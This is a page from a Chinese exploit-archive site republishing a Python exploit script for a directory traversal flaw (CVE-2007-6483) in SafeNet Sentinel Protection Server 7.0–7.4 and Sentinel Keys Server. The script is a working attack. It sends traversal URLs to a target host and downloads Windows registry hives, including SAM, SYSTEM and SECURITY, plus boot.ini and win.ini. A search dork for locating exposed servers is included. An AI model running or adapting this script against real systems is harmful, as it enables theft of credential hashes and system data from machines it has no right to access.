首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SafeNet Sentinel Protection Server 7.0 - 7.4 and Sentinel Keys Server 1.0.3 - 1.
来源:Syph0n 作者:Schmidt 发布时间:2014-05-20  
#!/usr/bin/python
#
# Exploit Title: SafeNet Sentinel Protection Server 7.0 - 7.4 and Sentinel Keys Server 1.0.3 - 1.0.4 Directory Traversal 
# Date: 04/28/2014
# Exploit Author: Matt Schmidt (Syph0n)
# Vendor Homepage: http://www.safenet-inc.com/
# Software Link: http://c3.safenet-inc.com/downloads/2/1/21DAC8BE-72DE-4D32-85D4-6A1FC600581E/Sentinel%20Protection%20Installer%207.4.0.exe
# Version: SafeNet Sentinel Protection Server 7.0.0 through 7.4.0 and Sentinel Keys Server 1.0.3
# Tested on: Windows 7 and Windows XP SP2
# CVE: CVE-2007-6483
# Dork: intitle:"Sentinel Keys License Monitor"
# Greets to norsec0de
  
import sys, urllib2, argparse
  
print '\n[+] SafeNet Sentinel Protection Server 7.0 - 7.4 Directory Traversal Exploit'
print '[+] Written by Matt Schmidt (Syph0n)'
print '[+] This script will download the registry hives, boot.ini and win.ini off the Target Windows box'
print '[+] For Windows versions other than Windows XP you will have to append the --file option and specifiy a file\n'
  
  
# Define Help Menu
if (len(sys.argv) < 2) or (sys.argv[1] == '-h') or (sys.argv[1] == '--help'):
    print 'Usage:'
    print './exploit.py --host <target> [options]'
    print '    <host>: The victim host\n'
    print '  Options:'
    print '    --port      The port the application is listening on (default: 7002)'
    print '    --file      Path to the desired remote file (ex. windows/repair/sam) without starting slash\n\n'
    sys.exit(1)
  
# Parse Arguments
parser = argparse.ArgumentParser()
parser.add_argument('--host', required = True)
parser.add_argument('--port', type = int, default = 7002)
parser.add_argument('--file')
args = parser.parse_args()
  
# Define Variables
host = args.host
port = args.port
if args.file is not None :
    targetFile = [args.file]
else:
    targetFile = ['windows/repair/default', 'windows/repair/sam', 'windows/repair/system', 'windows/repair/software', 'windows/repair/security', 'boot.ini', 'windows/win.ini']
  
# Send Exploit
print '[+] Sending exploit!'
  
# Loop for multiple files
for path in targetFile:
    # Define Directory Traversal path
    url = "http://" + host + ":" + str(port) + "/../../../../../../../../../../../../../../" + str(path)
          
    # Retrieve file(s)
    exploit = urllib2.urlopen(url)
    header = exploit.info()
    size = int(header.getheaders("Content-Length")[0])
    print "\n[+] Downloading: C:\%s ! Bytes: %s" % (path, size)
    filename = url.rsplit('/',1)
    with open(str(filename[1]), "wb") as contents:
        contents.write(exploit.read())

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·HP Release Control Authenticat
·UPS Web/SNMP-Manager CS121 Log
·CyberLink Power2Go Essential 9
·Symantec Workspace Streaming A
·AoA DVD Creator 2.6.2 - Active
·SPIP - CMS < 3.0.9 / 2.1.22 /
·AoA Audio Extractor Basic 2.3.
·Easy File Management Web Serve
·AoA MP4 Converter 4.1.2 - Acti
·Easy Address Book Web Server 1
·Intel Ideo Video 4.5 Memory Co
·LL Page Mitigations On Windows
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved